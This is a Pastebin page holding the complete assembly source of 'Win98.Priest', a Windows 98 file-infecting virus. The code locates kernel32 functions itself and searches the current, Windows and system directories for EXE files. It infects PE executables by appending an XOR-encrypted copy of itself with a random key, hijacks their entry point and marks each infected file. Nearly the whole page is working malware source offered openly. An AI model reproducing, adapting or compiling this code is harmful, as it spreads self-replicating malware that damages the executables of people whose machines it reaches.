Advertisement
FlyFar

Virus.Win98.Priest - Source Code

Jun 20th, 2023
672
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
ASM (NASM) 7.68 KB | Cybersecurity | 0 0
  1. ; Win98.Priest
  2. .386
  3. .model flat
  4. extrn      ExitProcess:PROC
  5. KER32 equ 0bff70000h
  6. Limit equ 0000h
  7. addname equ 0004h
  8. addfun  equ 0008h
  9. addord  equ 000Ch
  10. create  equ 0010h
  11. close   equ 0014h
  12. rfile   equ 0018h
  13. ffind   equ 001ch
  14. nfind   equ 0020h
  15. white   equ 0024h
  16. fpoin   equ 0028h
  17. getw    equ 002ch
  18. gets    equ 0030h
  19. getc    equ 0034h
  20. srchc   equ 0038h
  21. getp    equ 003ch
  22. shand   equ 0040h
  23. fhand   equ 0044h
  24. reads   equ 0048h
  25. OLDEDI  equ 004ch
  26. chkif   equ 0050h
  27. chkdi   equ 0054h
  28. WICHI   equ 0058h
  29. exew    equ 005ch
  30. DATAA   equ 0200h
  31. heads   equ 0300h
  32. .code
  33. Start_Virus:
  34. Call Delta_Offset
  35. Delta_Offset:
  36. Pop Ebp
  37. Sub Ebp,Offset Delta_Offset
  38. pushad
  39. KEY_CODE:
  40. mov EAX,00h
  41. LEA eSI,[VIRUS_BODY+EBP]
  42. mov ecx,End_Virus - VIRUS_BODY -4
  43. KEYCODE:
  44. XOR DWORD ptr [esi],eax
  45. add esi,1
  46. xchg al,ah
  47. ror eax,1
  48. loop KEYCODE
  49. VIRUS_BODY:
  50. popad
  51. push eax
  52. mov eax,[OLDIP+ebp]
  53. add eax,400000h
  54. push eax
  55. call Scan_DATA
  56. mov EDI,ESI
  57. add ESI,6
  58. cmp word ptr [esi],0
  59. je  R_IP
  60. xor ecx,ecx
  61. mov cx,[esi]
  62. add ESI,0f2h
  63. add ESI,24h
  64. add edi,0f8h
  65. CHk_se:
  66. mov eax,[esi]
  67. and eax,0c0000000h
  68. cmp eax,0c0000000h
  69. jne Next_Se
  70. mov eax,[edi+8h]
  71. mov ebx,511
  72. add eax,ebx
  73. xor edx,edx
  74. inc ebx
  75. div ebx
  76. mul ebx
  77. sub eax,[edi+10h]
  78. cmp eax,700h+(W_ENC_END - W_ENC)
  79. jge  OK_SE
  80. Next_Se:
  81. add esi,28h
  82. add edi,28h
  83. loop CHk_se
  84. JMP R_IP
  85. OK_SE:
  86. mov esi,[edi+0ch]
  87. add esi,[edi+10h]
  88. add esi,400000h
  89. mov ebp,ESI
  90. xor eax,eax
  91. mov esi,KER32+3ch
  92. lodsw
  93. add eax,KER32
  94. cmp dword ptr [eax],00004550h
  95. jne R_IP
  96. mov esi,[eax+78h]
  97. add esi,24
  98. add esi,KER32
  99. lodsd
  100. add eax,KER32
  101. mov [ebp+Limit],eax
  102. lodsd
  103. add eax,KER32
  104. mov [ebp+addfun],eax
  105. lodsd
  106. add eax,KER32
  107. mov [ebp+addname],eax
  108. lodsd
  109. add eax,KER32
  110. mov [ebp+addord],eax
  111. pop eax
  112. pop ebx
  113. push ebx
  114. push eax
  115. mov esi,ebx
  116. add esi,offset gp - Start_Virus
  117. mov ebx,esi
  118. mov edi,[ebp+addname]
  119. mov edi,[edi]
  120. add edi,KER32
  121. xor ecx,ecx
  122. call FIND_SRC
  123. shl ecx,1
  124. mov esi,[ebp+addord]
  125. add esi,ecx
  126. xor eax,eax
  127. mov ax,word ptr [esi]
  128. shl eax,2
  129. mov esi,[ebp+addfun]
  130. add esi,eax
  131. mov edi,[esi]
  132. add edi,KER32
  133. mov [getp+ebp],edi
  134. mov ebx,create
  135. pop eax
  136. pop edi
  137. push edi
  138. push eax
  139. add edi,offset cf - Start_Virus
  140. FIND_FUN:
  141. push edi
  142. push KER32
  143. call [getp+ebp]
  144. mov [ebx+ebp],eax
  145. add ebx,4
  146. cmp ebx,getp
  147. je  OK_FIND_FILE
  148. mov al,0
  149. repne scasb
  150. jmp FIND_FUN
  151. OK_FIND_FILE:
  152. lea eax,[ebp+exew]
  153. push eax
  154. push 100h - 58h
  155. call [getc+ebp]
  156. or eax,eax
  157. je CHG_DIR
  158. OK_EXE:
  159. lea esi,[ebp+DATAA]
  160. push esi
  161. lea edi,[ebp+exew]
  162. push edi
  163. scan_dir:
  164. cmp byte ptr [edi],00h
  165. je ok_make_exe
  166. add edi,1
  167. jmp scan_dir
  168. ok_make_exe:
  169. mov al,''
  170. stosb
  171. mov dword ptr [ebp+WICHI],edi
  172. mov ax,'.*'
  173. stosw
  174. mov eax,'EXE'
  175. stosd
  176. call [ebp+ffind]
  177. mov [ebp+shand],eax
  178. cmp eax,-1
  179. je R_IP
  180. mov eax,0
  181. open_file:
  182. cmp byte ptr [ebp+DATAA+2ch+eax],'v'
  183. je NEXT_FILE
  184. cmp byte ptr [ebp+DATAA+2ch+eax],'n'
  185. je NEXT_FILE
  186. cmp byte ptr [ebp+DATAA+2ch+eax],'V'
  187. je NEXT_FILE
  188. cmp byte ptr [ebp+DATAA+2ch+eax],'N'
  189. je NEXT_FILE
  190. cmp byte ptr [ebp+DATAA+2ch+eax],0
  191. je open_file_start
  192. add eax,1
  193. jmp open_file
  194. open_file_start:
  195. mov edi,dword ptr [ebp+WICHI]
  196. mov ecx,20
  197. lea esi,[ebp+DATAA+2ch]
  198. repz movsb
  199. push 0
  200. push 0
  201. push 3
  202. push 0
  203. push 0
  204. push 0c0000000h
  205. lea eax,[ebp+exew]
  206. push eax
  207. call [ebp+create]
  208. mov [ebp+fhand],eax
  209. cmp eax,-1
  210. je File_Close
  211. mov ecx,400h
  212. lea edx,[ebp+heads]
  213. lea eax,[ebp+reads]
  214. push 0
  215. push eax
  216. push ecx
  217. push edx
  218. push dword ptr [ebp+fhand]
  219. call [ebp+rfile]
  220. cmp eax,0
  221. je File_Close
  222. cmp word ptr [ebp+heads],'ZM'
  223. jne File_Close
  224. xor eax,eax
  225. lea esi,[ebp+heads+3ch]
  226. lodsw
  227. add eax,ebp
  228. add eax,heads
  229. mov esi,eax
  230. lea ebx,[ebp+heads+400h]
  231. cmp eax,ebx
  232. jg  File_Close
  233. cmp word ptr [eax],'EP'
  234. jne File_Close
  235. cmp dword ptr [eax+34h],400000h
  236. jne File_Close
  237. cmp word ptr [ebp+heads+12h],'^^'
  238. je File_Close
  239. cmp word ptr [esi+6],6
  240. jg File_Close
  241. xor ecx,ecx
  242. mov edi,esi
  243. mov cx,word ptr [esi+6]
  244. add edi,0f8h
  245. CHK_DATA:
  246. add edi,24h
  247. mov eax,dword ptr [edi]
  248. and eax,0c0000000h
  249. cmp eax,0c0000000h
  250. je  OK_INFECT
  251. add edi,4h
  252. loop CHK_DATA
  253. jmp File_Close
  254. OK_INFECT:
  255. mov eax,[ebp+DATAA+20h]
  256. call F_SEEK
  257. mov edi,[esi+28h]
  258. pop ebx
  259. pop eax
  260. push eax
  261. push ebx
  262. add eax,offset OLDIP - Start_Virus
  263. mov dword ptr [eax],edi
  264. mov eax,offset End_Virus - Start_Virus
  265. mov ecx,[esi+3ch]
  266. add eax,ecx
  267. xor edx,edx
  268. div ecx
  269. mul ecx
  270. add dword ptr [esi+50h],eax
  271. mov ecx,eax
  272. pop eax
  273. pop ebx
  274. mov edx,ebx
  275. push ebx
  276. push eax
  277. push ecx
  278. push ecx
  279. mov ecx,End_Virus - Start_Virus
  280. pushad
  281. push edx
  282. add edx,offset W_ENC - Start_Virus
  283. mov esi,edx
  284. lea ebp,[ebp+heads]
  285. add ebp,400h
  286. mov edi,ebp
  287. push edi
  288. mov cx,offset W_ENC_END - W_ENC
  289. repz movsb
  290. pop edi
  291. jmp edi
  292. r_body:
  293. popad
  294. pop ecx
  295. sub ecx,offset End_Virus - Start_Virus
  296. mov edx,400000h
  297. call fwrite
  298. mov eax,[ebp+DATAA+20h]
  299. mov ecx,[esi+3ch]
  300. mov edx,0
  301. div ecx
  302. push edx
  303. push eax
  304. mov edi,esi
  305. mov ax,word ptr [esi+6]
  306. sub eax,1
  307. mov ecx,28h
  308. mul ecx
  309. add eax,0f8h
  310. add edi,eax
  311. xor edx,edx
  312. mov eax,[edi+14h]
  313. mov ecx,[esi+3ch]
  314. div ecx
  315. pop edx
  316. sub edx,eax
  317. push edx
  318. mov eax,[edi+10h]
  319. sub eax,1
  320. add eax,ecx
  321. xor edx,edx
  322. div ecx
  323. mov ebx,eax
  324. pop eax
  325. sub eax,ebx
  326. mul ecx
  327. pop edx
  328. add eax,edx
  329. add dword ptr [esi+50h],eax
  330. mov ebx,[edi+0ch]
  331. add ebx,[edi+10h]
  332. add ebx,eax
  333. mov [esi+28h],ebx
  334. pop ebx
  335. add ebx,eax
  336. add [edi+8h],ebx
  337. add [edi+10h],ebx
  338. mov [edi+24h],0c0000040h
  339. mov word ptr [ebp+heads+12h],'^^'
  340. mov eax,0
  341. call F_SEEK
  342. lea edx,[ebp+heads]
  343. mov ecx,400h
  344. call fwrite
  345. inc dword ptr chkif[ebp]
  346. File_Close:
  347. push dword ptr [ebp+fhand]
  348. call [ebp+close]
  349. cmp dword ptr chkif[ebp],6
  350. je CHG_DIR
  351. NEXT_FILE:
  352. lea eax,[ebp+DATAA]
  353. push eax
  354. push dword ptr [ebp+shand]
  355. call [ebp+nfind]
  356. cmp eax,0
  357. je CHG_DIR
  358. jmp open_file
  359. CHG_DIR:
  360. push dword ptr [shand+ebp]
  361. call [ebp+srchc]
  362. cmp dword ptr chkif[ebp],6
  363. je R_IP
  364. cmp dword ptr chkdi[ebp],1
  365. jg CHG_DIR_2
  366. add dword ptr chkdi[ebp],2
  367. push 100h-58h
  368. lea eax,[ebp+exew]
  369. push eax
  370. call [ebp+getw]
  371. or eax,eax
  372. je CHG_DIR_2
  373. jmp OK_EXE
  374. CHG_DIR_2:
  375. cmp dword ptr chkdi[ebp],2
  376. jg R_IP
  377. add dword ptr chkdi[ebp],1
  378. push 100h-58h
  379. lea eax,[ebp+exew]
  380. push eax
  381. call [ebp+gets]
  382. or eax,eax
  383. je R_IP
  384. jmp OK_EXE
  385. Scan_DATA:
  386. mov esi,400000h
  387. mov cx,600h
  388. Scan_PE:
  389. cmp dword ptr [esi],00004550h
  390. je R_CO
  391. inc esi
  392. loop Scan_PE
  393. R_IP:
  394. pop eax
  395. pop ebx
  396. jmp eax
  397. R_CO:
  398. ret
  399. FIND_SRC:
  400. mov esi,ebx
  401. X_M:
  402. cmpsb
  403. jne FIND_SRC_2
  404. cmp byte ptr [edi],0
  405. je R_CO
  406. jmp X_M
  407. FIND_SRC_2:
  408. inc cx
  409. cmp cx,[ebp+Limit]
  410. jge NOT_SRC
  411. add dword ptr [ebp+addname],4
  412. mov edi,[ebp+addname]
  413. mov edi,[edi]
  414. add edi,KER32
  415. jmp FIND_SRC
  416. NOT_SRC:
  417. pop esi
  418. jmp R_IP
  419. F_SEEK:
  420. push 0
  421. push 0
  422. push eax
  423. push dword ptr [ebp+fhand]
  424. call [ebp+fpoin]
  425. ret
  426. W_ENC:
  427. in al,40h
  428. xchg al,ah
  429. in al,40h
  430. add eax,edi
  431. add edi,offset ENCRY_E - W_ENC +1
  432. mov dword ptr [edi],eax
  433. pop edx
  434. add edx,offset KEY_CODE - Start_Virus +1
  435. mov dword ptr [edx],eax
  436. popad
  437. pushad
  438. mov esi,edx
  439. add esi,offset VIRUS_BODY - Start_Virus
  440. mov ecx,offset End_Virus - VIRUS_BODY -4
  441. call ENCRY_E
  442. popad
  443. pushad
  444. call fwrite
  445. popad
  446. pushad
  447. mov esi,edx
  448. add esi,offset VIRUS_BODY - Start_Virus
  449. mov ecx,offset End_Virus - VIRUS_BODY -4
  450. call ENCRY_E
  451. popad
  452. pushad
  453. add edx,offset r_body - Start_Virus
  454. jmp edx
  455. ENCRY_E:
  456. mov eax,00h
  457. ENCRY:
  458. xor dword ptr [esi],eax
  459. xchg al,ah
  460. ror eax,1
  461. inc esi
  462. loop ENCRY
  463. ret
  464. fwrite:
  465. push 0
  466. lea eax,[ebp+reads]
  467. push eax
  468. push ecx
  469. push edx
  470. push dword ptr [ebp+fhand]
  471. call [ebp+white]
  472. ret
  473. W_ENC_END:
  474. cf db 'CreateFileA',0
  475. cl db '_lclose',0
  476. rf db 'ReadFile',0
  477. ff db 'FindFirstFileA',0
  478. fn db 'FindNextFileA',0
  479. wf db 'WriteFile',0
  480. sf db 'SetFilePointer',0
  481. gw db 'GetWindowsDirectoryA',0
  482. gs db 'GetSystemDirectoryA',0
  483. gc db 'GetCurrentDirectoryA',0
  484. fc db 'FindClose',0
  485. gp db 'GetProcAddress',0
  486. vn db 'Win98.Priest'
  487.    db 'SVS/COREA/MOV'
  488. OLDIP  dd F_END - 400000h
  489. End_Virus:
  490. F_END:
  491. push 0
  492. call ExitProcess
  493.  
  494. end Start_Virus
  495.  
Tags: virus Win98
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement